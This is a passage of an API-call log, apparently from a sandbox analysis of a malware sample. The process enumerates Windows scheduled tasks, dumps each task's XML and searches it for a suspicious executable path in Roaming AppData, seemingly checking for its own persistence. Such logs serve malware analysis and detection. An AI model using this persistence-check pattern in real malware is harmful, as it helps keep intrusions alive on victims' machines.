Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.750] IUnknown:Release (This=0x126e90) returned 0x0 [0137.750] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.750] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="Office ClickToRun Service Monitor") returned 0x0 [0137.750] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0137.754] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.754] IUnknown:Release (This=0x126e90) returned 0x0 [0137.754] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.754] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="OfficeBackgroundTaskHandlerLogon") returned 0x0 [0137.754] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0137.767] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.767] IUnknown:Release (This=0x126e90) returned 0x0 [0137.767] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.768] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="OfficeBackgroundTaskHandlerRegistration") returned 0x0 [0137.768] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0137.782] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.783] IUnknown:Release (This=0x126e90) returned 0x0 [0137.783] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.783] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0137.783] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0137.786] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.786] IUnknown:Release (This=0x126e90) returned 0x0 [0137.786] IRegisteredTaskCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126e90) returned 0x0 [0137.786] IRegisteredTask:get_Name (in: This=0x126e90, pName=0x24dc10 | out: pName=0x24dc10*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0137.786] IRegisteredTask:get_Xml (in: This=0x126e90, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0137.790] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.790] IUnknown:Release (This=0x126e90) returned 0x0 [0137.790] IUnknown:Release (This=0x126d50) returned 0x0 [0137.790] ITaskFolder:GetFolders (in: This=0x126cd0, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126d50) returned 0x0 [0137.792] ITaskFolderCollection:get_Count (in: This=0x126d50, pCount=0x24dd78 | out: pCount=0x24dd78*=0) returned 0x0 [0137.792] IUnknown:Release (This=0x126d50) returned 0x0 [0137.792] TaskScheduler:IUnknown:Release (This=0x126cd0) returned 0x0 [0137.792] ITaskFolderCollection:get_Item (in: This=0x126b90, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x126cd0) returned 0x0 [0137.792] ITaskFolder:GetTasks (in: This=0x126cd0, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126d50) returned 0x0 [0137.793] IRegisteredTaskCollection:get_Count (in: This=0x126d50, pCount=0x24dd60 | out: pCount=0x24dd60*=0) returned 0x0 [0137.793] IUnknown:Release (This=0x126d50) returned 0x0 [0137.793] ITaskFolder:GetFolders (in: This=0x126cd0, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126d50) returned 0x0 [0137.844] ITaskFolderCollection:get_Count (in: This=0x126d50, pCount=0x24dd78 | out: pCount=0x24dd78*=45) returned 0x0 [0137.844] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.844] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0137.847] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0137.847] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0137.847] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0137.847] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0137.851] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.852] IUnknown:Release (This=0x127130) returned 0x0 [0137.852] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0137.852] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0137.852] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0137.855] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.855] IUnknown:Release (This=0x127130) returned 0x0 [0137.855] IUnknown:Release (This=0x126f90) returned 0x0 [0137.855] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0137.859] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.859] IUnknown:Release (This=0x126f90) returned 0x0 [0137.859] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.859] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.859] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0137.862] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0137.862] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0137.862] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="PolicyConverter") returned 0x0 [0137.862] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0137.864] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.864] IUnknown:Release (This=0x127080) returned 0x0 [0137.864] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127080) returned 0x0 [0137.865] IRegisteredTask:get_Name (in: This=0x127080, pName=0x24da80 | out: pName=0x24da80*="VerifiedPublisherCertStoreCheck") returned 0x0 [0137.865] IRegisteredTask:get_Xml (in: This=0x127080, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0137.867] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.867] IUnknown:Release (This=0x127080) returned 0x0 [0137.867] IUnknown:Release (This=0x126f30) returned 0x0 [0137.867] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0137.869] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0137.869] IUnknown:Release (This=0x126f30) returned 0x0 [0137.869] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0137.869] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0137.869] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0137.871] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0137.871] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0137.871] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="AitAgent") returned 0x0 [0137.871] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n") returned 0x0 [0137.874] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0137.874] IUnknown:Release (This=0x1270c0) returned 0x0 [0137.874] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0137.874] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="ProgramDataUpdater") returned 0x0 [0137.874] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n") returned 0x0 [0137.876] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n 